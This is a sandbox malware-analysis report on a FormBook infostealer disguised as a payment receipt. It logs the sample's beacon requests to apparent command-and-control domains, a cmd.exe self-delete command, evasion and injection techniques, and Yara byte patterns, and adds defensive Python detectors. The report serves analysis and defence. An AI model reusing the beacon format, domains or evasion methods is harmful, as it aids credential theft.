
Analysis Report Final-Payment-Receipt.exe

Overview

General Information

Sample Name: Final-Payment-Receipt.exe
Analysis ID: 320833
MD5: 8f5d29001a9f5d4f62b47af6442be5ab
SHA1: 4838464ffe421aad7c9d73ba19420b7e9c2c427d
SHA256: 8e01fb320ffa60c0157bfc9aa8c6de43a7802d7f408de907a0d6338ce25c239c
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • Final-Payment-Receipt.exe (PID: 1692 cmdline: 'C:\Users\user\Desktop\Final-Payment-Receipt.exe' MD5: 8F5D29001A9F5D4F62B47AF6442BE5AB)
    • Final-Payment-Receipt.exe (PID: 5764 cmdline: C:\Users\user\Desktop\Final-Payment-Receipt.exe MD5: 8F5D29001A9F5D4F62B47AF6442BE5AB)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 4732 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 5932 cmdline: /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
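The tree above shows the sample spawning a second copy of itself, explorer.exe appearing under that copy, wlanext.exe under explorer.exe, and finally cmd.exe deleting the original file from the Desktop. As an added example (not Joe Sandbox code and not part of the report), the Python below rebuilds that ancestry from process-creation events and flags a cmd.exe "del" whose target is the image an ancestor of that cmd.exe was launched from, reporting which system binary proxied the deletion. The event records are transcribed from the tree above; the dict layout, the regex and the rule itself are this example's assumptions.

```python
import re

# Process-creation events transcribed from the Startup tree in this report
# (PIDs, image names and command lines as listed there). The dict layout is
# this example's own, not a Joe Sandbox or Sysmon export format. The report
# renders command-line quotes as single quotes; they are kept that way here.
# explorer.exe appears under PID 5764 in the report because it was injected
# into rather than spawned; the tree is used here exactly as the report gives it.
EVENTS = [
    {"pid": 1692, "ppid": 0,    "image": "Final-Payment-Receipt.exe",
     "cmdline": r"'C:\Users\user\Desktop\Final-Payment-Receipt.exe'"},
    {"pid": 5764, "ppid": 1692, "image": "Final-Payment-Receipt.exe",
     "cmdline": r"C:\Users\user\Desktop\Final-Payment-Receipt.exe"},
    {"pid": 3472, "ppid": 5764, "image": "explorer.exe", "cmdline": ""},
    {"pid": 4732, "ppid": 3472, "image": "wlanext.exe",
     "cmdline": r"C:\Windows\SysWOW64\wlanext.exe"},
    {"pid": 5932, "ppid": 4732, "image": "cmd.exe",
     "cmdline": r"/c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'"},
    {"pid": 1132, "ppid": 5932, "image": "conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# "del <path>" with optional single or double quotes around the path.
DEL_RE = re.compile(r"""(?:^|\s)del\s+["']?(?P<target>[^"']+?)["']?\s*$""",
                    re.IGNORECASE)


def _norm(path: str) -> str:
    """Strip surrounding quotes and case so a quoted and an unquoted path compare equal."""
    return path.strip().strip("\"'").lower()


def ancestry(by_pid: dict, pid: int) -> list:
    """Walk parent links from pid to the root; the process itself comes first."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def find_proxied_self_delete(events: list) -> list:
    """Flag cmd.exe 'del' commands whose target is the image an ancestor in the
    same tree was started from, and report the chain between the two."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if e["image"].lower() != "cmd.exe":
            continue
        m = DEL_RE.search(e["cmdline"])
        if not m:
            continue
        target = _norm(m["target"])
        chain = ancestry(by_pid, e["pid"])
        owners = [a for a in chain[1:] if _norm(a["cmdline"]) == target]
        if owners:
            findings.append({
                "cmd_pid": e["pid"],
                "deleted": m["target"],
                # the direct parent of cmd.exe is the binary that ran the delete
                "proxy": chain[1]["image"] if len(chain) > 1 else None,
                "chain": [a["image"] for a in chain],
                "owner_pids": [a["pid"] for a in owners],
            })
    return findings


if __name__ == "__main__":
    for f in find_proxied_self_delete(EVENTS):
        print(f"cmd.exe PID {f['cmd_pid']} deleted {f['deleted']} via {f['proxy']}; "
              f"chain: {' <- '.join(f['chain'])}; owners: {f['owner_pids']}")
```

The useful signal is the combination: the file being deleted is the one an ancestor was started from, and the process issuing the delete is not that sample but a Windows binary (wlanext.exe) sitting under explorer.exe. Either fact alone is noisy; together they describe the hand-off the tree shows.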

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18419:$sqlite3step: 68 34 1C 7B E1
  • 0x1852c:$sqlite3step: 68 34 1C 7B E1
  • 0x18448:$sqlite3text: 68 38 2A 90 C5
  • 0x1856d:$sqlite3text: 68 38 2A 90 C5
  • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.Final-Payment-Receipt.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.Final-Payment-Receipt.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a537:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b53a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.Final-Payment-Receipt.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17619:$sqlite3step: 68 34 1C 7B E1
  • 0x1772c:$sqlite3step: 68 34 1C 7B E1
  • 0x17648:$sqlite3text: 68 38 2A 90 C5
  • 0x1776d:$sqlite3text: 68 38 2A 90 C5
  • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b337:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c33a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further entry not shown)
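The byte patterns the two community rules matched above can be checked directly against a dump. The following Python is an added example written for this page, not Joe Sandbox's code and not either rule author's: it scans a buffer for the JPCERT/CC strings and the yara-signator sequences listed in the tables and reports their offsets. The rule conditions applied here ("all of them" for the JPCERT/CC rule, a 7-of-10 threshold for Formbook_1) and the test buffer (seeded random filler with the patterns planted at the offsets the Unpacked PEs table gives for the 0x400000 unpack) are this example's assumptions, not something the page states.

```python
import random
import re

# Byte patterns copied from the Yara match listings in this report.
# JPCERT/CC "Formbook" rule strings. Each is an x86 `push imm32`; the rule
# names them after the sqlite3 exports the pushed hashes select at run time.
JPCERT = {
    "sqlite3step": bytes.fromhex("68 34 1C 7B E1"),
    "sqlite3text": bytes.fromhex("68 38 2A 90 C5"),
    "sqlite3blob": bytes.fromhex("68 53 D8 7F 8C"),
}

# yara-signator "Formbook_1" sequences as listed in the tables above.
# $sequence_0 decodes to `add ecx,eax; rdtsc; sub eax,ecx; mov [ebp-4],eax`,
# the RDTSC timing check the report lists under the anti-VM signatures.
SIGNATOR = {
    "sequence_0": bytes.fromhex("03 C8 0F 31 2B C1 89 45 FC"),
    "sequence_1": bytes.fromhex("3C 24 0F 84 76 FF FF FF 3C 25 74 94"),
    "sequence_2": bytes.fromhex("3B 4F 14 73 95 85 C9 74 91"),
    "sequence_3": bytes.fromhex("3C 69 75 44 8B 7D 18 8B 0F"),
    "sequence_4": bytes.fromhex("5D C3 8D 50 7C 80 FA 07"),
    "sequence_5": bytes.fromhex("0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06"),
    "sequence_6": bytes.fromhex("57 89 45 FC 89 45 F4 89 45 F8"),
    "sequence_7": bytes.fromhex("66 89 0C 02 5B 8B E5 5D"),
    "sequence_8": bytes.fromhex("3C 54 74 04 3C 74 75 F4"),
    "sequence_9": bytes.fromhex("56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00"),
}


def scan(buf: bytes, patterns: dict) -> dict:
    """Return {name: [offsets]} for every pattern that occurs in buf."""
    hits = {}
    for name, pat in patterns.items():
        offs = [m.start() for m in re.finditer(re.escape(pat), buf)]
        if offs:
            hits[name] = offs
    return hits


def classify(buf: bytes) -> dict:
    """Apply the two rules' conditions. 'all of them' for the JPCERT/CC rule
    and the 7-of-10 threshold for Formbook_1 are assumptions of this example;
    the page does not print either rule's condition."""
    jp = scan(buf, JPCERT)
    sig = scan(buf, SIGNATOR)
    return {
        "jpcert_formbook": len(jp) == len(JPCERT),
        "signator_sequences": len(sig),
        "signator_formbook_1": len(sig) >= 7,
        "hits": {**jp, **sig},
    }


def build_sample_buffer(size: int = 0x20000) -> bytes:
    """Constructed test input, not bytes of the real sample: seeded random
    filler with the patterns planted at the offsets the Unpacked PEs table
    lists for 1.2.Final-Payment-Receipt.exe.400000.0.unpack."""
    rng = random.Random(320833)
    buf = bytearray(rng.getrandbits(8) for _ in range(size))
    for off, pat in [
        (0x8AE8, SIGNATOR["sequence_0"]), (0x8D62, SIGNATOR["sequence_0"]),
        (0x14885, SIGNATOR["sequence_1"]), (0x14371, SIGNATOR["sequence_2"]),
        (0x14987, SIGNATOR["sequence_3"]), (0x14AFF, SIGNATOR["sequence_4"]),
        (0x977A, SIGNATOR["sequence_5"]), (0x135EC, SIGNATOR["sequence_6"]),
        (0xA473, SIGNATOR["sequence_7"]), (0x1A537, SIGNATOR["sequence_8"]),
        (0x1B53A, SIGNATOR["sequence_9"]),
        (0x17619, JPCERT["sqlite3step"]), (0x1772C, JPCERT["sqlite3step"]),
        (0x17648, JPCERT["sqlite3text"]), (0x1776D, JPCERT["sqlite3text"]),
        (0x1765B, JPCERT["sqlite3blob"]), (0x17783, JPCERT["sqlite3blob"]),
    ]:
        buf[off:off + len(pat)] = pat
    return bytes(buf)


if __name__ == "__main__":
    verdict = classify(build_sample_buffer())
    for name, offs in verdict["hits"].items():
        print(name, [hex(o) for o in offs])
    print("JPCERT Formbook:", verdict["jpcert_formbook"],
          "| Formbook_1 sequences:", verdict["signator_sequences"])
```

Every Yara hit in this report is against a memory dump or an unpacked image, none against the submitted file, so a scan like this has to run over process memory or a post-unpack dump; the file on disk only registers with the multi-scanner and ML verdicts.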

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: Final-Payment-Receipt.exe | ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Final-Payment-Receipt.exe | Joe Sandbox ML: detected
Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h | 0_2_055EBFA0
Source: global traffic | HTTP traffic detected:
  GET /71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr HTTP/1.1
  Host: www.wacrox.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr HTTP/1.1
  Host: www.trumpingitagain.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr HTTP/1.1
  Host: www.themindofafunnygirl.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View | ASN Name: DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU
Source: Joe Sandbox View | ASN Name: AUTOMATTICUS AUTOMATTICUS
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: unknown | DNS traffic detected: queries for: g.msn.com
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Thu, 19 Nov 2020 21:20:27 GMT
  Server: Apache/2.4.29 (Ubuntu)
  Content-Length: 327
  Connection: close
  Content-Type: text/html; charset=utf-8
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 37 31 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /71m/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Final-Payment-Receipt.exe, 00000000.00000002.232733869.00000000023B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: wlanext.exe, 00000003.00000002.492344982.00000000041AF000.00000004.00000001.sdmp | String found in binary or memory: https://themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98
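The three GET requests logged above share the path /71m/ and the trailing parameter ZL3=rVvxt090-21lhr across three unrelated hosts, carry no User-Agent, and close the connection each time. As an added example (not Joe Sandbox code and not a rule from this report), the Python below parses raw HTTP requests, flags that shape, and pivots hosts on the (path id, trailing parameter) pair. The beacon heuristic, the helper names, and the sample requests (rebuilt from the three request lines above, plus one constructed browser-style request as a negative control) are this example's own.

```python
import re
from collections import defaultdict

# Request shape seen in this report: GET /<id>/?<key>=<blob>&<key2>=<tag>,
# only Host and Connection: close as headers, no User-Agent. Treating that
# shape as a beacon is this example's heuristic, not a Joe Sandbox signature.
BEACON_PATH = re.compile(
    r"^/(?P<campaign>[A-Za-z0-9]+)/\?"
    r"(?P<k1>[A-Za-z0-9]+)=(?P<v1>[^&\s]+)&"
    r"(?P<k2>[A-Za-z0-9]+)=(?P<v2>[A-Za-z0-9_-]+)$"
)


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, target, lower-cased headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    return method, target, headers


def beacon_features(raw: str):
    """Return pivot fields for a request matching the beacon shape, else None."""
    method, target, headers = parse_request(raw)
    m = BEACON_PATH.match(target)
    if method != "GET" or m is None:
        return None
    if "user-agent" in headers or headers.get("connection", "").lower() != "close":
        return None
    return {"host": headers.get("host", ""), "campaign": m["campaign"],
            "tail": f"{m['k2']}={m['v2']}"}


def pivot(requests) -> dict:
    """Group beacon hosts by (campaign id, trailing parameter). The same pair
    fanning out to several unrelated hosts is what the report's traffic shows."""
    groups = defaultdict(set)
    for raw in requests:
        f = beacon_features(raw)
        if f:
            groups[(f["campaign"], f["tail"])].add(f["host"])
    return {k: sorted(v) for k, v in groups.items()}


def _req(path: str, host: str, ua: str = None, conn: str = "close") -> str:
    """Build a raw request string; used only to construct the sample input."""
    lines = [f"GET {path} HTTP/1.1", f"Host: {host}"]
    if ua:
        lines.append(f"User-Agent: {ua}")
    lines.append(f"Connection: {conn}")
    return "\r\n".join(lines) + "\r\n\r\n"


# Constructed from the three GET request lines in the report, plus one benign
# browser-style request (www.example.com, constructed) as a negative control.
SAMPLE_REQUESTS = [
    _req("/71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr",
         "www.wacrox.com"),
    _req("/71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr",
         "www.trumpingitagain.com"),
    _req("/71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr",
         "www.themindofafunnygirl.com"),
    _req("/index.html", "www.example.com", ua="Mozilla/5.0", conn="keep-alive"),
]

if __name__ == "__main__":
    for key, hosts in pivot(SAMPLE_REQUESTS).items():
        print(f"campaign {key[0]} / {key[1]} -> {hosts}")
```

The pivot is what makes this traffic actionable: one path id plus one constant trailing parameter fanning out to several hosts is a stronger signal than any single domain. A per-hostname block list would also have treated the 404 logged above as harmless, while the request shape flags it regardless of what the server answered.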

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
